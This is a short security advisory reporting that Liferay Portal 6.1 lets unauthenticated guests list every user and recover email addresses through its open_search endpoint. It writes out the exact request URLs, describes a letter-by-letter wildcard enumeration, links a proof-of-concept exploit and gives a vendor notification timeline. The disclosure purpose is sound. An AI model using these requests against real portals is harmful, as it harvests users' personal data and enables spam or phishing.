Guests can view names and emailadresses of all Liferay users in liferay 6.1


Guests can view names and emailadresses of all Liferay users in liferay 6.1 Description: Liferay Portal is an enterprise portal written in Java As an unauthenticated user it is possible to retrieve the names and email adresses of all Liferay users. To retrieve a list of all users simply issue the following request http://vulnerablehost/c/search/open_search?p=1&c=5000&keywords=entryClassName:com.liferay.portal.model.User Getting to the email adresses is a bit more involved, because these are not included in the response. But it is still possible to get to them by utilizing wildcard searches. The following request will return all users who's email address start with a "b" http://vulnerablehost/c/search/open_search?p=1&c=5000&keywords=emailAddress:b* By adding a letter at a time to the emailAddress parameter its possible to eventually get someone's full email address Proof of concept: Code demonstrating the vulnerability can be found at https://github.com/jelmerk/liferay-opensearch-exploit Systems affected: Liferay 6.1 ce Liferay 6.1 ee is possibly affected Vendor status : Liferay was notified may 5 2012 by filing a bug in their public bugtracker under issue number LPS-27146. The issue has since been marked as a duplicate of LPS-25877 which is an issue that one of the core engineers filed, but not under the security category. This ticket did not mention the possibility of obtaining the email addresses The issue is possibly already silently resolved in the for-pay enterprise edition but not in the community edition